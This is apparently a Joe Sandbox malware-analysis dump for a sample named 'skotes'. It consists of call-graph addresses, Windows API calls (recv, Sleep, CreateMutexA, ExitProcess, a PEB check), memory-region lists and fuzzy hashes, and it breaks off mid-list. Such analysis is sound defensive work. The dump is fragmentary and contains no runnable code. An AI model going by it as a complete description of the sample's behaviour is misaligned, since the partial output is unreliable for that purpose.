___std_exception_copy 10149 b9b1ad 10136->10149 10138 b9b598 10145 b9af56 10138->10145 10141 b8242a 10141->10127 10153 bb4f29 10142->10153 10144 b9b555 10144->10136 10144->10138 10144->10141 10146 b9af9f ___std_exception_copy 10145->10146 10148 b9afb2 shared_ptr 10146->10148 10159 b9b39f 10146->10159 10148->10141 10150 b9b1d8 10149->10150 10152 b9b1e1 shared_ptr 10149->10152 10151 b9b39f 4 API calls 10150->10151 10151->10152 10152->10141 10154 bb4f2e __cftof 10153->10154 10154->10144 10155 bbd634 __cftof 3 API calls 10154->10155 10158 bb8bfc __cftof 10154->10158 10155->10158 10156 bb65ed __cftof 3 API calls 10157 bb8c2f 10156->10157 10158->10156 10160 b9bedf InitOnceExecuteOnce 10159->10160 10161 b9b3e1 10160->10161 10162 b9b3e8 10161->10162 10170 bb6cbb 10161->10170 10162->10148 10171 bb6cc7 __cftof 10170->10171 10172 bba671 __cftof 3 API calls 10171->10172 10175 bb6ccc 10172->10175 10173 bb8bec __cftof 3 API calls 10174 bb6cf6 10173->10174 10175->10173 10200 b820c0 10201 b9c68b __Mtx_init_in_situ 2 API calls 10200->10201 10202 b820cc 10201->10202 10203 b8e0c0 recv 10204 b8e122 recv 10203->10204 10205 b8e157 recv 10204->10205 10207 b8e191 10205->10207 10206 b8e2b3 std::invalid_argument::invalid_argument 10207->10206 10208 b9c6ac GetSystemTimePreciseAsFileTime 10207->10208 10209 b8e2ee 10208->10209 10210 b9c26a 4 API calls 10209->10210 10211 b8e358 10210->10211 10212 b82ec0 10213 b82f7e GetCurrentThreadId 10212->10213 10214 b82f06 10212->10214 10215 b82f94 10213->10215 10216 b82fef 10213->10216 10217 b9c6ac GetSystemTimePreciseAsFileTime 10214->10217 10215->10216 10222 b9c6ac GetSystemTimePreciseAsFileTime 10215->10222 10218 b82f12 10217->10218 10219 b8301e 10218->10219 10223 b82f1d __Mtx_unlock 10218->10223 10220 b9c26a 4 API calls 10219->10220 10221 b83024 10220->10221 10224 b9c26a 4 API calls 10221->10224 10225 b82fb9 10222->10225 10223->10221 10226 b82f6f 10223->10226 10224->10225 10227 b9c26a 4 API calls 10225->10227 10228 b82fc0 __Mtx_unlock 10225->10228 10226->10213 10226->10216 10227->10228 10229 b9c26a 4 API calls 10228->10229 10230 b82fd8 __Cnd_broadcast 10228->10230 10229->10230 10230->10216 10231 b9c26a 4 API calls 10230->10231 10232 b8303c 10231->10232 10233 b9c6ac GetSystemTimePreciseAsFileTime 10232->10233 10242 b83080 shared_ptr __Mtx_unlock 10233->10242 10234 b831c5 10235 b9c26a 4 API calls 10234->10235 10236 b831cb 10235->10236 10237 b9c26a 4 API calls 10236->10237 10238 b831d1 10237->10238 10239 b9c26a 4 API calls 10238->10239 10248 b83193 __Mtx_unlock 10239->10248 10240 b831a7 std::invalid_argument::invalid_argument 10241 b9c26a 4 API calls 10243 b831dd 10241->10243 10242->10234 10242->10236 10242->10240 10244 b83132 GetCurrentThreadId 10242->10244 10244->10240 10245 b8313b 10244->10245 10245->10240 10246 b9c6ac GetSystemTimePreciseAsFileTime 10245->10246 10249 b8315f 10246->10249 10247 b9bd4c GetSystemTimePreciseAsFileTime 10247->10249 10248->10240 10248->10241 10249->10234 10249->10238 10249->10247 10249->10248 10259 b82e00 10260 b82e28 10259->10260 10261 b9c68b __Mtx_init_in_situ 2 API calls 10260->10261 10262 b82e33 10261->10262 10340 b88980 10342 b889d8 shared_ptr 10340->10342 10343 b88aea 10340->10343 10341 b85c10 3 API calls 10341->10342 10342->10341 10342->10343 10499 b89f44 10501 b89f4c shared_ptr 10499->10501 10500 b8a953 Sleep CreateMutexA 10502 b8a98e 10500->10502 10501->10500 10503 b8a01f shared_ptr 10501->10503 10250 b9d0c7 10252 b9d0d7 10250->10252 10251 b9d17f 10252->10251 10253 b9d17b RtlWakeAllConditionVariable 10252->10253 10291 b83c47 10292 b83c51 10291->10292 10294 b832d0 5 API calls 10292->10294 10295 b83c5f 10292->10295 10293 b83c68 10294->10295 10295->10293 10296 b83810 3 API calls 10295->10296 10297 b83cdb shared_ptr 10296->10297 10298 bb6a44 10299 bb6a5c 10298->10299 10300 bb6a52 10298->10300 10303 bb698d 10299->10303 10302 bb6a76 __freea 10304 bb690a __cftof 3 API calls 10303->10304 10305 bb699f 10304->10305 10305->10302

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 351 bb652b-bb6538 call bba302 354 bb655a-bb656c call bb656d ExitProcess 351->354 355 bb653a-bb6548 GetPEB 351->355 355->354 356 bb654a-bb6559 355->356 356->354
                                                                                                                                                                APIs
                                                                                                                                                                • ExitProcess.KERNEL32(?,?,00BB652A,?,?,?,?,?,00BB7661), ref: 00BB6567
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2212616596.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.2212595295.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212616596.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212698575.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212722785.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212748647.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212881177.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212911404.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213058348.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213081792.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213099332.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213119970.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213142325.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213164561.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213193073.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213214678.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213249882.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213269198.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213297921.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213322573.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213347437.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213369914.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213394298.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213420667.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213443978.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213467870.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213496984.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213519853.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213542967.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213565181.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213588695.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213620092.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213649557.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213678014.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213705079.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213741370.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213758244.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213842451.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213870900.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213897006.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213920919.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213946530.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213977085.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214002671.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214026456.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                • Opcode ID: f18ea144acfd6876bd55ecf4e68d0d05d34c13c8292718e55e7f5fa430e6a02a
                                                                                                                                                                • Instruction ID: b55430fd45911aafbf65b08cc6e259a7e57fe7fd1db976b7a954be43b7e9d08e
                                                                                                                                                                • Opcode Fuzzy Hash: f18ea144acfd6876bd55ecf4e68d0d05d34c13c8292718e55e7f5fa430e6a02a
                                                                                                                                                                • Instruction Fuzzy Hash: 32E08C3104110CAFCE367B19C849AAD3BE9EB61745F114880F80846222CBA9EDA2C680

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2212616596.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.2212595295.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212616596.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212698575.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212722785.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212748647.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212881177.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212911404.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213058348.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213081792.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213099332.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213119970.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213142325.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213164561.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213193073.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213214678.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213249882.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213269198.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213297921.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213322573.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213347437.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213369914.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213394298.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213420667.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213443978.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213467870.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213496984.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213519853.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213542967.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213565181.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213588695.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213620092.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213649557.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213678014.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213705079.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213741370.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213758244.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213842451.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213870900.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213897006.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213920919.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213946530.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213977085.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214002671.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214026456.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 9526f95cab84faf5f9f52a31eb41dbf8774913f84d89f9f12e0bb845c2b3b86b
                                                                                                                                                                • Instruction ID: 8be872830f53d788833ea367f16aff7841898361554b46051707466f8316e508
                                                                                                                                                                • Opcode Fuzzy Hash: 9526f95cab84faf5f9f52a31eb41dbf8774913f84d89f9f12e0bb845c2b3b86b
                                                                                                                                                                • Instruction Fuzzy Hash: 00311631A042049BEF08FB78DD897BEBBE2EB86310F248699E054972E5C7769981C751

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 22 b89f44-b89f64 26 b89f92-b89fae 22->26 27 b89f66-b89f72 22->27 28 b89fdc-b89ffb 26->28 29 b89fb0-b89fbc 26->29 30 b89f88-b89f8f call b9d663 27->30 31 b89f74-b89f82 27->31 34 b8a029-b8a916 call b980c0 28->34 35 b89ffd-b8a009 28->35 32 b89fbe-b89fcc 29->32 33 b89fd2-b89fd9 call b9d663 29->33 30->26 31->30 36 b8a92b 31->36 32->33 32->36 33->28 42 b8a00b-b8a019 35->42 43 b8a01f-b8a026 call b9d663 35->43 38 b8a953-b8a994 Sleep CreateMutexA 36->38 39 b8a92b call bb6c6a 36->39 51 b8a996-b8a998 38->51 52 b8a9a7-b8a9a8 38->52 39->38 42->36 42->43 43->34 51->52 54 b8a99a-b8a9a5 51->54 54->52
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2212616596.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.2212595295.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212616596.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212698575.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212722785.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212748647.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212881177.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212911404.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213058348.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213081792.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213099332.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213119970.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213142325.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213164561.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213193073.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213214678.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213249882.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213269198.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213297921.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213322573.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213347437.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213369914.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213394298.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213420667.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213443978.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213467870.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213496984.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213519853.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213542967.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213565181.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213588695.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213620092.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213649557.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213678014.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213705079.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213741370.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213758244.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213842451.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213870900.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213897006.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213920919.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213946530.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213977085.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214002671.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214026456.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 89bb0512f61f5d08c0e8d7fc9bb4b443fbd0f8dc1c0a108f63d8bb28ac6de998
                                                                                                                                                                • Instruction ID: bf929924ef89005e86ccd8ea64e8b0968ce774bc4fd82493aee37faa4846236f
                                                                                                                                                                • Opcode Fuzzy Hash: 89bb0512f61f5d08c0e8d7fc9bb4b443fbd0f8dc1c0a108f63d8bb28ac6de998
                                                                                                                                                                • Instruction Fuzzy Hash: CC3148316041449BFF08FB78DC997BDB7E2EB86310F24469AE058DB2E1C775A980C752

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 56 b8a079-b8a099 60 b8a09b-b8a0a7 56->60 61 b8a0c7-b8a0e3 56->61 62 b8a0a9-b8a0b7 60->62 63 b8a0bd-b8a0c4 call b9d663 60->63 64 b8a111-b8a130 61->64 65 b8a0e5-b8a0f1 61->65 62->63 68 b8a930 62->68 63->61 66 b8a15e-b8a916 call b980c0 64->66 67 b8a132-b8a13e 64->67 70 b8a0f3-b8a101 65->70 71 b8a107-b8a10e call b9d663 65->71 73 b8a140-b8a14e 67->73 74 b8a154-b8a15b call b9d663 67->74 77 b8a953-b8a994 Sleep CreateMutexA 68->77 78 b8a930 call bb6c6a 68->78 70->68 70->71 71->64 73->68 73->74 74->66 85 b8a996-b8a998 77->85 86 b8a9a7-b8a9a8 77->86 78->77 85->86 88 b8a99a-b8a9a5 85->88 88->86
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2212616596.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.2212595295.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212616596.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212698575.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212722785.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212748647.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212881177.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212911404.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213058348.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
